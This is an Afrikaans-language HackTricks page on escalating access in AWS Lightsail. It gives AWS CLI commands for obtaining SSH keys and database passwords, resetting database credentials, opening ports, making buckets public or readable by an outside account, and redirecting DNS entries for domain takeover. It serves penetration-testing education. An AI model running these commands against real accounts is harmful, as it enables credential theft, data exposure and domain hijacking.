AWS - Lightsail Privesc

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Lightsail

Vir meer inligting oor Lightsail, kyk na:

AWS - Lightsail Enum

Dit is belangrik om daarop te let dat Lightsail nie IAM-rolle wat aan die gebruiker behoort nie gebruik nie, maar aan 'n AWS-bestuurde rekening, so jy kan nie hierdie diens misbruik om privesc te doen nie. Tog kan sensitiewe data soos kode, API-sleutels en databasisinligting in hierdie diens gevind word.

lightsail:DownloadDefaultKeyPair

Hierdie toestemming sal jou in staat stel om die SSH-sleutels te kry om toegang tot die instansies te verkry:

aws lightsail download-default-key-pair

Potensiële Impak: Vind sensitiewe inligting binne die instansies.

lightsail:GetInstanceAccessDetails

Hierdie toestemming sal jou in staat stel om SSH-sleutels te genereer om toegang tot die instansies te verkry:

aws lightsail get-instance-access-details --instance-name <instance_name>

Potensiële Impak: Vind sensitiewe inligting binne die instansies.

lightsail:CreateBucketAccessKey

Hierdie toestemming sal jou in staat stel om 'n sleutel te verkry om toegang tot die emmer te verkry:

aws lightsail create-bucket-access-key --bucket-name <name>

Potensiële Impak: Vind sensitiewe inligting binne die emmer.

lightsail:GetRelationalDatabaseMasterUserPassword

Hierdie toestemming sal jou in staat stel om die geloofsbriewe te verkry om toegang tot die databasis te verkry:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Potensiële Impak: Vind sensitiewe inligting binne die databasis.

lightsail:UpdateRelationalDatabase

Hierdie toestemming sal jou in staat stel om die wagwoord te verander om toegang tot die databasis te verkry:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

As die databasis nie openbaar is nie, kan jy dit ook openbaar maak met hierdie toestemmings met

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Potensiële Impak: Vind sensitiewe inligting binne die databasis.

lightsail:OpenInstancePublicPorts

Hierdie toestemming maak dit moontlik om poorte na die internet oop te maak.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Potensiële Impak: Toegang tot sensitiewe poorte.

lightsail:PutInstancePublicPorts

Hierdie toestemming maak dit moontlik om poorte na die internet oop te maak. Let daarop dat die oproep enige poort wat nie daarop gespesifiseer is nie, sal sluit.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Potensiële Impak: Toegang tot sensitiewe poorte.

lightsail:SetResourceAccessForBucket

Hierdie toestemmings maak dit moontlik om 'n instansie toegang tot 'n emmer te gee sonder enige ekstra geloofsbriewe

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Potensiële Impak: Potensiële nuwe toegang tot houers met sensitiewe inligting.

lightsail:UpdateBucket

Met hierdie toestemming kan 'n aanvaller sy eie AWS-rekening leestoegang verleen oor houers of selfs die houers openbaar maak vir almal:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potensiële Impak: Potensiële nuwe toegang tot emmers met sensitiewe inligting.

lightsail:UpdateContainerService

Met hierdie toestemmings kan 'n aanvaller toegang verleen tot private ECRs vanaf die kontainerdiens.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Potensiële Impak: Kry sensitiewe inligting van private ECR

lightsail:CreateDomainEntry

'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres verwys (subdomein-oorgeneem), of 'n SPF-rekord skep wat hom toelaat om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres instel.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potensiële Impak: Oorname van 'n domein

lightsail:UpdateDomainEntry

'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres verwys (subdomein-oorgawe), of 'n SPF-rekord skep wat hom in staat stel om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres instel.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potensiële Impak: Oorname van 'n domein

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated